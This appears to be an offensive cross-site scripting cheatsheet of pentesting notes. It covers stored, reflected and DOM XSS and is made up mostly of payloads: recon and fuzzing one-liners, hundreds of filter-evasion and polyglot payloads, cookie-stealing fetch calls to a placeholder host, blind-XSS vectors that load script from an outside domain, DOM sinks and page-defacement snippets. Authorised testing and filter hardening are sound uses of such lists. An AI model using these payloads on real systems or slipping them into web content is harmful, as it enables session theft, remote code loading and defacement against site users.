Types of attack
Other browser based exploits - There are millions of possibilities with XSS.
Types of XSS
The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)
Reflected (Non-Persistent) XSS
Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)
Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags)
Cheatsheet
Extension to incorporate XSS Cheatsheet in Burp
One Liner
Copy waybackurls test.com | tee test.com-urls.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><svg/onload=confirm(1)>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<svg/onload=confirm(1)>" && echo -e "$host \e[31m Vulnerable\n" || echo -e "$host \e[32m Not Vulnerable\n";done
Copy $ waymore -i urls | tee urls-his
$ cat urls-his | gf xss | urless|anew xss
$ knoxnl -i xss -X BOTH Fuzzing
Bypass weak validations
Copy echo "<svg/onload=alert(1)>" | recollapse | ffuf -w - -u "https://example.com/?param=FUZZ" -mc 200,403,500 Reflected Parameters
Chrome extension
Basic Payloads
Polyglot payload - All in one
Copy 1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; >
Copy 1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
Copy 1'"<S><Input Value=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
Copy '"*/onmouseover=(print)?.()><sVg/oNload='1>(_=prompt,_`{{7*7}}`)'></sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror='alert`1`%27'src>xhzeem%22%3E%3CSvg/\u0022\u003e\u003csVg/\x22\x3e\x3csVg/"><svG/onload=alert`2`//
Copy JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
Try to start the payloads with a single quote ' or a double quote " .
Also try with, > , '> and ">
Check the source code to close the appropriate tag if necessary
Try with confirm() instead of alert()
Copy JavaScript://%250Aalert?.(1337)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1337)}//><Base/Href=//hello\76-->
</Scri%7Kt><Scri%7Kt>%7Krompt%6K1337%6K</Scri%7Kt>
"%26%2339>alert(1337)>%26%2339<Svg>
<script>alert(1337);</script>
<sc<script>ript>alert(1337);</script>
<sCriPt>alert(1337);</sCriPt>
<button onmouseover="alert(1337);">xss</button>
<button onclick="alert(1337);">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert(1337)">
<img src="x" onerror="alert(1337)">
<img src="x" onerror="alert(1337);"
<img src="#" onerror="alert(1337)">
<img src="#" onerror="alert(1337)">
<img src="#" onerror="eval('alert(1337)')">
<img src onerror %09=top['ale'%2b'rt'](1337)>
<script alert (1337)</script>
<script	>alert(1337)</script>
<script
>alert (1337)</script>
<script
>alert (1)</script>
<%00script>alert(1337)</script>
<script>al%00ert(1)</script>
<input type="text" name ="input" value="1337">
<input type="text" name ="input" value ="><script>alert (1337)</script>
<randomtag type="text" name ="input" value ="><script>alert(1337)</script>
<input/type="text" name="input" value="><script>alert(1337)</script>
<input	type="text " name ="input" value =">< alert(1337)</script>
<input
type="text" name ="input" value =">< alert(1337)</script>
<input
type="text" name ="input" value =">< alert(1337)</script>
<input/'type="text" name ="input" value =">< alert(1337)</script>
<iNpUt type="text" name ="input" value =">< alert(1337)</script>
<%00input type="text" name="input" value="><script>alert(1337)</script>
<inp%00ut type="text" name ="input" value =">< alert(1337)</script>
<input t%00ype="text" name="input" value="><script>alert(1337)</script>
<input type="text" name ="input" value ="><script>a%00lert(1337)</script>
<input onsubmit alert(1337)>
<img onerror="alert(1337)"src=x>
<img onerror='alert(1337)'src=x>
<img onerror=`alert(1337)` src=x>
<img onerror=`alert(1337)`src=x>
<<script>alert(1337)//<</script>
«input onsubmit=alert(1337)»
®input onsubmit=alert(1337)¯
<script>eval('a\u006cert(1337)')</script>
<script>eval('al' + 'ert(1337)')</script>
<iframe src="javascript:alert(`1337`)">
testfmy90"onfocus%3d"alert(1337)"autofocus%3d"ed3vz
<script>alert(1337)</script>
<Script>alert(1337)</Script>
<sCript>alert(1337)</sCript>
<script>alert(1337);</script>
<script>alert("1337");</script>
<script>alert(1337)</script>
<script>window.pageType = 'test'-alert(1337)-'';</script>
</script><script>alert(1337)</script>
\"+confirm(1337)+"
//%01javascript:alert(1337)
%09Jav%09ascript:alert(1337)
/%09/javascript:alert(1337)
/%09/javascript:alert(1337);
//%0Aalert(1337)
////%0Aalert(1337)
//%0D%0Aalert(1337)
/%5cjavascript:alert(1337)
/%5cjavascript:alert(1337);
//%5cjavascript:alert(1337)
//%5cjavascript:alert(1337);
";alert(1337);//
";alert(1337);//bash
java%0d%0ascript%0d%0a:alert(1337)
javascript://%0aalert(1337)
javascript://%00alert(1337)
javascript://%0aalert(1337)
javascript://%0Aalert(1337)
javascript://%250A1?alert(1337):0
javascript://%250Aalert(1337)
javascript://%250Aalert(1337)//?1
javascript:alert(1337)
//javascript:alert(1337)
//javascript:alert(1337);
/javascript:alert(1337)
/javascript:alert(1337);
<>javascript:alert(1337);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1337\)
javascript:alert(1337)
javascript:alert(1337);
javascript:alert(1337)%0d%0a
javascript:confirm(1337)
javascript:prompt(1337)
javascript:void(0);alert(1337)
/x:1/:///%01javascript:alert(1337)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1337)//
JavaScript://%250Dtop.confirm?.(1337)//
1'-top['con\146irm'](1337)-'
/confirm?.(1337)//\
test"/><output name="result" onclick="alert(1337)">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1337)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(1337)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1337)%26gt;>
%22%20onmouseover=alert(1337)%20x=%22
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1337)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1337)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1337)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert(1337)%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert(1337)//%3E%5Cx3e
<script\x20type="text/javascript">javascript:alert(1337);</script>
<script\x3Etype="text/javascript">javascript:alert(1337);</script>
<script\x0Dtype="text/javascript">javascript:alert(1337);</script>
<script\x09type="text/javascript">javascript:alert(1337);</script>
<script\x0Ctype="text/javascript">javascript:alert(1337);</script>
<script\x2Ftype="text/javascript">javascript:alert(1337);</script>
<script\x0Atype="text/javascript">javascript:alert(1337);</script>
'`"><\x3Cscript>javascript:alert(1337)</script>
'`"><\x00script>javascript:alert(1337)</script>
<img src=1 href=1 onerror="javascript:alert(1337)"></img>
<audio src=1 href=1 onerror="javascript:alert(1337)"></audio>
<video src=1 href=1 onerror="javascript:alert(1337)"></video>
<body src=1 href=1 onerror="javascript:alert(1337)"></body>
<image src=1 href=1 onerror="javascript:alert(1337)"></image>
<object src=1 href=1 onerror="javascript:alert(1337)"></object>
<script src=1 href=1 onerror="javascript:alert(1337)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1337)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1337)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1337)"></iframe onLoad>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a(1337)%20x>
<audio controls onwaiting=alert(1337)><source src=x type=x></audio>
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/
<K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\
<section onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></section>
</<K><Svg Onload=alert(1337)>
</<Kno XSS="><Svg Onload=alert(1337)>
<!<K><Svg Onload=alert(1337)>
<!<Kno XSS="><Svg Onload=alert(1337)>
<a href="javascript:alert(1337)">show</a>
<a href="data:text/html;base64,<alert(1337) encoded>"show</a>
<form action="javascript:alert(1337)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1337)">send</button>
<object data="javascript:alert(1337)">
<object data="data:text/html;base64, <alert(1337) encoded>">
<body onload=alert(1337)>
<input type=image src=x:x onerror=alert(1337)>
<isindex onmouseover="alert(1337)" >
<form oninput=alert(1337)><input></form>
<texarea autofocus onfocus=alert(1337)>
<input oncut=alert(1337)>
<svg onload=alert(1337)>
<keygen autofocus onfocus=alert(1337)">
<video><source onerror="alert(1337)">
<marquee onstart=alert(1337)>
<svg/onload=alert(1337)>
<svg//////onload=alert(1337)>
<svg id=x; onload=alert(1337)>
<svg onload%09=alert(1337)>
<svg %09onload=alert(1337)>
<svg %09onload%20=alert(1337)>
<svg onload%09%20%28%2C%3B=alert(1337)>
<svg onload%0B=alert(1337)>
<svg id='x' onload=alert(1337)>
<script>\u0061lert(1337)</script>
<script>\u0061\u006\u0065\u0072\u0074(1337)</script>
<script>eval("\u0061lert(1337)")</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0033\u0033\u0037\u0029")</script>
<img src=x onerror="\u0061lert(1337)"/>
<img src=x onerror="eval('\141lert(1337)')"/>
<img src=x onerror="eval('\x61lert(1337)')"/>
<img src=x onerror="eval('alert(1337)')"/>
<img src=x onerror="eval('alert(1337)')"/>
<img src=x onerror="eval('\a\l\ert(1\)')"/>
<img src=x onerror="eval('\a\l\ert(1\3\3\7\)')"/>
<object data="JaVScRiPt:alert(1337)">
<object data="javascript::alert(1337)">
<object data="javascript:alert(1337)">
<object data="javascript:alert(1337)">
<object data="javascript:alert(1337)">
<object data="data:text/html,<script>alert(1337)</script>">
<embed code="DaTa:text/html,<script>alert(1337)</script>">
<embed code="data:text/html,<script>alert(1337)</script>">
<embed code="data:text/html,<script>alert(1337)</script>">
<embed code="data:text/html,<script>alert(1337)</script>">
<scr<iframe>ipt>alert(1337)</script>
<scr<script>ipt>alert(1337)</script>
<svg/onload=alert(1337)
"><svg/onload=alert(1337)>
";alert(1337);//
<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">">
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
<Img Src=OnXSS OnError=alert(1337)>
confirm?.(1337)
<svg/onload=window[`al`+/e/[`ex`+`ec`]`e`+`rt`](1337)>
<svg/onload=window["al"+"ert"]`1337`>
<svg/onload=document['default'+'View'][`\u0061lert`](1337)>
<svg/onload=parent[/al/.source+/ert/.source](1337)>
<svg/onload=parent[/al/.source.concat(/ert/.source)](1337)>
<svg/onload=(function(x){this[x+`ert`](1337)})`al`>
"""ontoggle=alert(1337)
"' "'"ontoggle=alert1337
1%27/prompt?.(1337)/%27
*prompt(1337)*
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<img//////src=x oNlY=1 oNerror=alert(1337)//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1337>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1337`//>
%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
"><track/onerror='confirm\%601337\%60'>
<Img Src=OnXSS OnError={prompt`1337`}>
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(1337),%200);})();">Click%20me!</div>
<Img Src=OnXSS OnError=confirm(1337)>
"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/1337/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto">
x' oncontentvisibilityautostatechange=alert(1337) style='display:block;content-visibility:auto
<p oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto">
test" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto
test" oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto
<Img/Src/OnError=(alert)(1337)>
1%27;--<img%20src=x%20onerror=javascript:alert(1337)>
"></a></td></tr></table><script>prompt('1337');</script></html>//
1")'--><Svg%0COnLoad=(confirm)(1337)<!--
%3Cimg%20src%3Dx%20onerror%3D%22%5Cu0061lert(1337)%22%3E
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${ </style> }<foo-b id="><img src onerror='alert(1337)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1337)>
%27";}</script><script>prompt(document.domain);</script>
<svg xmlns="http://w3.org/2000/svg" onload="this.setAttribute('onmouseover','confirm(1337)')"></svg>
1'"--><A HRef AutoFocus OnFocus=alert(1337)//
1</Script><Script>1/*'/*\'/**//alert(1337)// Payload List
Copy </Scri%7Kt><Scri%7Kt>%7Krompt%6K1%6K</Scri%7Kt>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--</Title/</Style/</Script/</textArea/</iFrame>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
"%26%2339>alert(1)>%26%2339<Svg>
<script>alert('xss');</script>
<sc<script>ript>alert('xss');</script>
<sCriPt>alert('xss');</sCriPt>
<button onmouseover="alert('xss');">xss</button>
<button onclick="alert('xss');">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert('xss')">
<img src="x" onerror="alert('xss')">
<img src="x" onerror="alert(document.cookie);"
<iframe src="javascript:alert(`xss`)">
testfmy90"onfocus%3d"alert(1)"autofocus%3d"ed3vz
<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
\"+confirm(1)+"
//%01javascript:alert(1)
%09Jav%09ascript:alert(1)
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
//%0Aalert(1)
////%0Aalert(1)
//%0D%0Aalert(1)
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
";alert(0);//
";alert(0);//bash
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
java%0d%0ascript%0d%0a:alert(0)
javascript://%0aalert(document.cookie)
javascript://%00alert(1)
javascript://%0aalert(1)
javascript://%0Aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
javascript:alert(0)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascript:alert(1)%0d%0a
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
javascript:void(0);alert(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
javascript://whitelisted.com/?z=%0Aalert(1)
/x:1/:///%01javascript:alert(document.cookie)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1)//
JavaScript://%250Dtop.confirm?.(1)//
1'-top['con\146irm'](1)-'
/confirm?.(1)//\
<img src=x onerror="fetch('[HOST]' + document.cookie)" />
<script>fetch('[host]')</script>
test"/><output name="result" onclick="alert('something')">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1)%26gt;>
%22%20onmouseover=alert(document.domain)%20x=%22
<<https:http://x55.is/onfocus=1?import(tagName):1 AutoFocus ContentEditable>>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e Tiny XSS
Copy <base/href=//NJ.₨>
<svg/onload=eval(name)>
<style/onload=eval(name)>
<svg/onload=eval(`'`+URL)>
<svg/onload=location=name>
<style/onerror=eval(name)>
<script/src=//NJ.₨></script>
<svg/onload=import(/\NJ.₨/)>
<iframe/onload=src=top.name>
<svg><svg/onload=eval(name)>
<style/onload=eval(`'`+URL)>
<iframe/onload=eval(`'`+URL)>
<style/onload=import(/\NJ.₨/)>
<audio/src/onerror=eval(name)>
<iframe/onload=import(/\NJ.₨/)>
<img/src/onerror=eval(`'`+URL)>
<iframe/onload=src=top[0].name+/\NJ.₨/>
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<iframe/onload=src=contentWindow.name+/\NJ.₨/>
<iframe/srcdoc="<script/src=//NJ.₨></script>"> Stored XSS
Copy <script>alert(window.origin)</script>
Tip: Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of window.origin in the alert box, instead of a static value like 1 . In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.
Copy <script>print()</script> Will pop up the browser print dialog, which is unlikely to be blocked by any browser
Cookies
Copy <script>alert(document.cookie)</script> Reflected XSS
Copy <div></div><ul class="list-unstyled" id="todo"><div style="padding-left:25px">Task '<script>alert(window.origin)</script>' could not be added.</div></ul> The single quotes contain our XSS payload '<script>alert(window.origin)</script>'.
GET request sends their parameters and data as part of the URL. So, to target a user, we can send them a URL containing our payload.
Copy http://URL/index.php?task=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E DOM XSS
Sink:
Document Sink
Copy someDOMElement.innerHTML
someDOMElement.outerHTML
someDOMElement.insertAdjacentHTML
document.write()
document.writeln()
Location Sink
Copy document.location
window.location.assign()
window.location.replace() Execution Sink
Copy eval()
setTimeout()
setInterval()
Function() DOM Source
A source is a JavaScript property that accepts data that is potentially attackercontrolled
Copy document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
location.search
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
jQuery:
Copy var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);
Copy document.getElementById("todo").innerHTML = "<b>Next Task:</b> " + decodeURIComponent(task); innerHTML function does not allow the use of the <script> tags within it as a security feature
Payload:
Copy <img src="" onerror=alert(window.origin)>
Copy # Open Redirect
Ex: https://example.com/redirect?url=jav%20ascri%20pt:alert(1)
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)
# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
Copy https://example.com/index.php/x' oncontentvisibilityautostatechange=alert(1) style='display:block;content-visibility:auto Dom-Explorer
Burp
Firefox Extension
Chrome extension
Blind XSS
Blind XSS Scanner
ezXSS
BeeXSS
XSSHunter
BXSS HUnter
KNOXSS
Blind XSS Custom Vector - Default
Copy <Script /Src=https://X55.is?1=[YOUR_ID]></Script> Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)
Copy '/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))//> Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)
Copy JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))}//\76--> XSS Discovery
Burp, Nessus, ZAP
Nuclei Template
Copy id: reflection
info:
name: search for reflection in header and body
author: roninja
severity: low
description: Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection.
reference:
- https://{{Hostname}}.{{interactsh-url}}
tags: reflection,header,cookies
metadata:
max-request: 2
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
Referer: https://r.{{Host}}.{{interactsh-url}}
Origin: https://o.{{Host}}.{{interactsh-url}}
Location: https://l.{{Host}}.{{interactsh-url}}
X-Forwarded-Host: xfh.{{Host}}.{{interactsh-url}}
X-Forwarded-For: xff.{{Host}}.{{interactsh-url}}
X-Host: xh.{{Host}}.{{interactsh-url}}
X-Original-Host: xoh.{{Host}}.{{interactsh-url}}
X-Original-URL: xou.{{Host}}.{{interactsh-url}}
Cookie: gude=tama.{{interactsh-url}}
Gudetama: {{interactsh-url}}
Accept-Encoding: gzip, deflate, br, zstd
- |
GET / HTTP/1.1
Host: {{Host}}.{{interactsh-url}}
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
Cookie: gude=tama.{{interactsh-url}}
Set-Cookie: gude=tama.{{interactsh-url}}
Accept-Encoding: gzip, deflate, br, zstd
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
Cookie: gude=tama.{{interactsh-url}}
Set-Cookie: gude=tama.{{interactsh-url}}
Accept-Encoding: gzip, deflate, br, zstd
redirects: false
stop-at-first-match: false
matchers-condition: or
matchers:
- type: regex
regex:
- '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
- '(?mi)^(.*:\s*.*oast.*)'
part: header
- type: regex
regex:
- '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
- '(?mi)^(.*:\s*.*oast.*)'
part: body
Open Source
Copy python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" Other great tool:
Release Page - build in - Just download
Manual
Defacing
Three HTML elements are usually utilized to change the main look of a web page:
Background Color document.body.style.background
Background document.body.background
Page Title document.title
Changing Background
Copy <script>document.body.style.background = "#141d2b"</script>
Copy # Change background color to red
<img src="test" onmouseover="document.body.style.backgroundColor = 'red'">
Copy <script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script> Changing Page Title
Copy <script>document.title = 'HackTheBox Academy'</script>
Copy # Title defacement
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script> Changing Page Text
Copy document.getElementById("todo").innerHTML = "New Text" jQuery
Copy $("#todo").html('New Text'); innerHTML
Copy document.getElementsByTagName('body')[0].innerHTML = "New Text" document.getElementsByTagName('body') => by specifying [0], we are selecting the first body element, which should change the entire text of the web page
